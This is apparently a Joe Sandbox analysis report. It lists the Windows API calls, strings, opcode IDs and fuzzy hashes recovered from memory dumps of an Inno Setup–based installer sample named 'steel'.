                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3202724764-0
                                                                                            • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                            • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                            • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                            • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                            APIs
                                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: TextWindow
                                                                                            • String ID:
                                                                                            • API String ID: 530164218-0
                                                                                            • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                            • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                            • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                            • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                            APIs
                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallbackDispatcherUser
                                                                                            • String ID:
                                                                                            • API String ID: 2492992576-0
                                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesFile
                                                                                            • String ID:
                                                                                            • API String ID: 3188754299-0
                                                                                            • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                            • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                            • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                            APIs
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID:
                                                                                            • API String ID: 823142352-0
                                                                                            • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                            • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                            APIs
                                                                                            • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                              • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 734332943-0
                                                                                            • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                            • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                            • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                            APIs
                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CurrentDirectory
                                                                                            • String ID:
                                                                                            • API String ID: 1611563598-0
                                                                                            • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                            • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                            • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode
                                                                                            • String ID:
                                                                                            • API String ID: 2340568224-0
                                                                                            • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                            • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                            • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DestroyWindow
                                                                                            • String ID:
                                                                                            • API String ID: 3375834691-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1452528299-0
                                                                                            APIs
                                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 1263568516-0
                                                                                            APIs
                                                                                            • LocalAlloc.KERNEL32(00000000,00000644,?,0049B450,004013A3,?,?,00401443,?,?,?,?,?,00401983), ref: 00401353
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocLocal
                                                                                            • String ID:
                                                                                            • API String ID: 3494564517-0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2962429428-0
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                            • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                            • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                            • API String ID: 2323315520-3614243559
                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 0045862F
                                                                                            • QueryPerformanceCounter.KERNEL32(02123858,00000000,004588C2,?,?,02123858,00000000,?,00458FBE,?,02123858,00000000), ref: 00458638
                                                                                            • GetSystemTimeAsFileTime.KERNEL32(02123858,02123858), ref: 00458642
                                                                                            • GetCurrentProcessId.KERNEL32(?,02123858,00000000,004588C2,?,?,02123858,00000000,?,00458FBE,?,02123858,00000000), ref: 0045864B
                                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02123858,02123858), ref: 004586CF
                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                            • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                              • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                            • API String ID: 770386003-3271284199
                                                                                            APIs
                                                                                              • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                              • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                              • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                              • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02122BDC,?,?,?,02122BDC), ref: 004783CC
                                                                                              • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02122BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                              • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02122BDC,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                            • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                            • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                            • API String ID: 883996979-221126205
                                                                                            • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                            • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                            • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendShowWindow
                                                                                            • String ID:
                                                                                            • API String ID: 1631623395-0
                                                                                            • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                            • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                            • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                            APIs
                                                                                            • IsIconic.USER32(?), ref: 00418393
                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                            • GetWindowRect.USER32(?), ref: 004183CC
                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                            • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                            • String ID: ,
                                                                                            • API String ID: 2266315723-3772416878
                                                                                            • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                            • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                            • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
